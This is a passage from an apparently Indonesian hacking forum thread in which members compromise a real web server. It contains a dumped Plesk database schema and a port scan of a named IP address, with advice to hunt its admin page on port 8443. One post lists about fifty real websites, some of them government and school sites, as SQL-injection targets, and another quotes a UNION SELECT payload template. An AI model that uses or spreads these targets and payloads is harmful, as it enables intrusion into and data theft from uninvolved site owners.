    [99]subdomains: id,dom_id,name,displayName,sys_user_type,sys_user_id,ssi,php,cgi,perl,python,fastcgi,miva,coldfusion,asp,asp_dot_net,ssl,same_ssl
    [100]sys_users: id,login,account_id,home,shell,quota
    [101]tts_cats: id,enabled,title
    [102]tts_conf: id,enabled,can_post,def_qu_id,def_pr_id,def_cat_id,mg_enabled,email_address,email_name,pop_server,pop_username,pop_password,query_period,start_ticket_subj
    [103]tts_priorities: id,enabled,title
    [104]tts_queues: id,enabled,title
    [105]tts_reporters: id,ref_reporter_id,type,email,name
    [106]tts_slave_info: server_id,enabled,can_post,cnt_new,cnt_opened,cnt_reopened,cnt_closed,updated_date
    [107]tts_ticket_events: id,ticket_id,event_type,public,reporter_id,created_date,descr
    [108]tts_tickets: id,reporter_id,cat_id,qu_id,pr_id,status,subject,modified_date
    [109]upgrade_history: upgrade_date,version_info,db_version
    [110]web_users: id,dom_id,sys_user_id,ssi,php,cgi,perl,python,fastcgi,asp,asp_dot_net
    [111]webalizer_group_referrer: id,dom_id,group_name,referrer
    [112]webalizer_hidden_referrer: id
    cb search jg yg di db lainny,. lom gw cb semua.. trus klo dari domain..ada 5 domain di IP dia :
    Code:
    IP: 72.22.72.202
    IP Country: ip address flag United States
     5 Hosts on this IP
    Number 	Domain / Host 	Functions
    1. 	ww.grenadegloves.com 	[Whois] [Trace] [Visit]
    2. 	www.propaganda-snow.com 	[Whois] [Trace] [Visit]
    3. 	grenadearmy.com 	[Whois] [Trace] [Visit]
    4. 	https: 	[Whois] [Trace] [Visit]
    5. 	www.grenadegloves.com 	[Whois] [Trace] [Visit]
    nah coba2juga dari situ bro masukny..cari admin pageny jg,. trus klo utk service2 di server ntu :
    Code:
    Completed SYN Stealth Scan at 09:08, 22.25s elapsed (1000 total ports)
    Initiating Service scan at 09:08
    Scanning 14 services on vps010-15.vps.securehostserver.com (72.22.72.202)
    Completed Service scan at 09:10, 131.23s elapsed (14 services on 1 host)
    SCRIPT ENGINE: Initiating script scanning.
    Host vps010-15.vps.securehostserver.com (72.22.72.202) appears to be up ... good.
    Interesting ports on vps010-15.vps.securehostserver.com (72.22.72.202):
    Not shown: 981 closed ports
    PORT     STATE    SERVICE      VERSION
    21/tcp   open     ftp          ProFTPD 1.3.1
    22/tcp   open     ssh          OpenSSH 4.3p2 Debian 9 (protocol 2.0)
    25/tcp   open     smtp?
    53/tcp   open     domain       ISC BIND 9.3.4
    80/tcp   open     http         Apache httpd 2.2.3
    106/tcp  open     pop3pw       poppassd
    110/tcp  open     pop3-proxy   AVG pop3 proxy 7.5.510/7.5.557
    135/tcp  filtered msrpc
    139/tcp  filtered netbios-ssn
    143/tcp  open     imap         Courier Imapd (released 2004)
    443/tcp  open     ssl/http     Apache httpd 2.2.3
    445/tcp  filtered microsoft-ds
    465/tcp  open     smtps?
    993/tcp  open     ssl/imap     Courier Imapd (released 2004)
    995/tcp  open     ssl/pop3     Courier pop3d
    1434/tcp filtered ms-sql-m
    1720/tcp filtered H.323/Q.931
    3306/tcp open     mysql        MySQL 5.0.32-Debian_7etch5-log
    8443/tcp open     ssl/http     Apache httpd 2.0.46 ((Red Hat) mod_ssl/2.0.46 OpenSSL/0.9.7a)
    Service Info: Host: localhost.localdomain; OSs: Unix, Linux, Windows
    nah ntu kan da sql server, ama https di port 8443, cb cr admin pageny di httpsny
    https://www.grenadegloves.com:8443/v...plesk/frameset
    tp gw lom cb uy..bnyk gawean..lanjutin aj bro ngopreknya..tar klo gw ad senggang gw coba jg
    Last edited by bl00d13z; 10-05-09 at 10:02.

  14. #13
    nveuu's Avatar
    Join Date
    Apr 2007
    Location
    di warnet
    Posts
    2,496
    Points
    494.79
    Thanks: 36 / 20 / 11

    Default

    bused... lengkappp!!!!!!!
    tq suhu....

  15. #14

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    update vulnerability SQLi link: just 4 learn

    http://www.rleague.com/db/article.php?id=33012
    http://www.gtk.fi/slr/article.php?id=18
    http://www.as-coa.org/article.php?id=1571
    http://www.edwardmiller.co.uk/gallery.php?id=15
    http://www.roxanehopper.com/gallery.php?id=19&img=119
    http://www.parkourgenerations.com/ga...hp?id=4&uid=25
    http://apcdesigner.com/nigel8/gallery.php?id=61
    http://www.wearisit.com/category.php?id=3
    http://test.mhs.ox.ac.uk/libcat/title.php?id=1509581
    http://www.seaofstories.com/title.php?id=4781
    http://www.smdailyjournal.com/articl...w.php?id=66988
    http://english.dvb.no/news.php?id=3498
    http://en.apa.az/news.php?id=52032
    http://burmese.dvb.no/news.php?id=7432
    http://www.kvbpr.com/news.php?id=61
    http://www.itjen.depkumham.go.id/new...aca&info_id=22
    http://elink.dinkespurworejo.go.id/m...=viewcat&cid=2
    http://www.siwakz.net/mod.php?mod=pu...icle&artid=275
    http://www.lcki.org/english/mod.php?...=viewcat&cid=3
    http://www.alvintoursindonesia.com/m...e&cid=&artid=8
    http://www.globalcertificate.com/mod...rticle&artid=4
    http://www.duniaflora.com/mod.php?mo...&cid=&artid=46
    http://www.adcom.empi.in/mod.php?mod...rticle&artid=9
    http://pojokantikorupsi.com/mod.php?...=12&artid=1354
    http://www.batamiklan.com/mod.php?mo...cid=&artid=214
    http://www.perpustakaan-islam.com/mo...icle&artid=181
    http://info.balitacerdas.com/mod.php...ticle&artid=45
    http://www.propertynbank.com/mod.php...icle&artid=198
    http://www.mimbar-opini.com/mod.php?...cle&artid=3191
    http://www.koinwnia.com/mod.php?mod=...d=16&artid=158
    http://komiq.org/read/mod.php?mod=pu...ticle&artid=45
    http://www.pedulisampah.org/mod.php?...rticle&artid=9
    http://www.infoibu.com/mod.php?mod=p...ticle&artid=88
    http://gbe.empi.in/mod.php?mod=publi...ticle&artid=22
    http://www.agenpulsa.info/mod.php?mo...icle&artid=140
    http://beritapendidikan.com/mod.php?...=12&artid=1354
    http://www.adjogja.com/mod.php?mod=p...cid=5&artid=81
    http://www.outlet-bisnis.com/mod.php...icle&artid=663
    http://mitrawacanawrc.com/mod.php?mo...id=&artid=1500
    http://www.perwatatower.com/mod.php?...ticle&artid=23
    http://paroki-sragen.or.id/mod.php?m...id=11&artid=58
    http://www.situsportal.com/mod.php?m...viewcat&cid=21
    http://www.mediaborneo.com/mod.php?m...rticle&artid=2
    http://trisnabalitours.com/mod.php?m...viewcat&cid=23
    http://www.solusta.com/mod.php?mod=p...rticle&artid=6
    http://www.ib-center.com/mod.php?mod...cid=20&artid=3
    http://www.konteriklan.com/mod.php?m...ticle&artid=66
    http://www.okebiz.com/mod.php?mod=pu...rticle&artid=8
    http://www.smpn19jkt.sch.id/article....=news&idbef=74
    Last edited by bl00d13z; 10-05-09 at 22:16.

  16. #15
    New_Dudutz's Avatar
    Join Date
    Jan 2007
    Location
    Earth~
    Posts
    1,178
    Points
    1,512.50
    Thanks: 0 / 1 / 1

    Default

    wah rada kurang ngerti nih bro bl00d13z,

    contohnya
    Code:
    UNION+ALL+SELECT+no_field+no_field+CONCAT_WS(PEMIS AH_HEXA_SQL,NAMA_FIELD1,NAMA_FIELD2,....)+FROM+NAM A_TABLE
    itu buat apa ya, itu SQL code ? gw rada bingung nyari2 code nya buat ngehubungin 1 page ke page lain.........@_@ ......

    Sell Magic Item 100% Low Price High Quality , Not ********, Contact Me

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •